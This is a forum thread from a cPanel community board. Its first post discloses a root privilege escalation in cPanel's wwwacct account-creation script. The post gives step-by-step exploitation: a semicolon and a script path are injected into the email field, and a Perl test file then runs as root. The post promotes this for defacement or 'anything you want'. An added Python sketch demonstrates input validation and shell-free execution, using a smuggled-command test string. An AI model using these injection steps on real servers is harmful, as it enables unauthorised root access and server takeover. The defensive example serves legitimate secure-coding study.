The Community Forums

bug report : root access with a reseller account.

Discussion in 'General Discussion' started by php-empire, Nov 8, 2008.

  1. php-empire

    By Ali Jasbi, IHST security hacking Research team, WwW.Hackerz.ir
    Vendor: Cpanel.net
    Version: ALL !!
    Risk: Very high
    What you can do with this bug is:
    you can have access to the whole server with reseller privileges (Th3 r00t)
    How does it work?
    When you want to create an account in the shell, what happens?
    ./scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
    You can run it with a web-based program! (cPanel: domain:2086)
    Example:
    http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
    It means you have access to wwwacct in the scripts folder (Th3 r00t),
    so you can run other commands with root access like this:
    ./scripts/wwwacct domain.com domain password ali_at_hackerz.ir;./home/hackerz/public_html/do.pl (your command is now ./home/hackerz/public_html/do.pl)
    You can likewise run it in the web-based program. All you need to do is write ali_at_hackerz.ir;./home/hackerz/public_html/do.pl in the Email text box when you create an account.
    ()()()()()()()()()()()()()
    Test it:
    ++++++++++++++++++++++++++
    Step 1

    Save this file in /home/user/public_html/do.pl .
    #!/usr/bin/perl
    $old = '/home/user/public_html/test.txt';
    $new = '/home/root/kon.txt';
    rename $old, $new;
    ++++++++++++++++++++++++++
    Step 2

    Make a text file named test.txt in your public_html directory.
    The path will be: /home/user/public_html/test.txt .
    ++++++++++++++++++++++++++
    Step 3

    Create an account and write ali_at_hackerz.ir;./home/user/public_html/do.pl in the E-mail Address text box,
    then click on the "create" button.
    Yes, you can find your file in /home/root/ .
    ++++++++++++++++++++++++++
    ()()()()()()()()()()()()()
    You can run your own code! (mass defacer, exploit,
    or anything that you want).
    Enjoy it...

    Hello cPanel security team,
    have you patched this bug in the new version?
    Very critical :(
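
The post above describes an E-mail field whose contents reach a command line, where `;` starts a second command. As an added example (not part of the original post and not cPanel's code), this Python sketch shows the two usual defenses together: reject the field unless it matches a strict allow-list, and pass fields as an argument vector so no shell ever parses them. The regex, the function names and the stand-in child process are assumptions made for illustration.

```python
import re
import subprocess
import sys

# Assumption: a deliberately strict allow-list for the e-mail field.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Stand-in for an account-creation script (hypothetical): it prints each
# argument it receives on its own line so we can see exactly what arrived.
STAND_IN = [sys.executable, "-c", "import sys; print('\\n'.join(sys.argv[1:]))"]


def validate_email(value):
    """Return value unchanged if it is a plain address, else raise ValueError."""
    if not EMAIL_RE.fullmatch(value):
        raise ValueError("rejected e-mail field: %r" % value)
    return value


def received_args(domain, user, password, email):
    """Pass the fields as an argument vector (no shell) and return what the
    child process saw. Shell metacharacters stay literal data."""
    argv = STAND_IN + [domain, user, password, email]
    out = subprocess.run(argv, capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


def create_account(domain, user, password, email):
    """Validate first, then execute without a shell (both layers)."""
    return received_args(domain, user, password, validate_email(email))


# Constructed inputs, not taken from a real system.
GOOD = "owner@example.com"
BAD = "owner@example.com;./marker.sh"

if __name__ == "__main__":
    # Without a shell, the whole BAD string arrives as one literal argument.
    print(received_args("example.com", "demo", "pw", BAD))
    try:
        create_account("example.com", "demo", "pw", BAD)
    except ValueError as exc:
        print(exc)  # the validation layer refuses the field outright
```
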
     
  2. weetabix

  3. php-empire

    Thank you very much
    Have a good time :)
     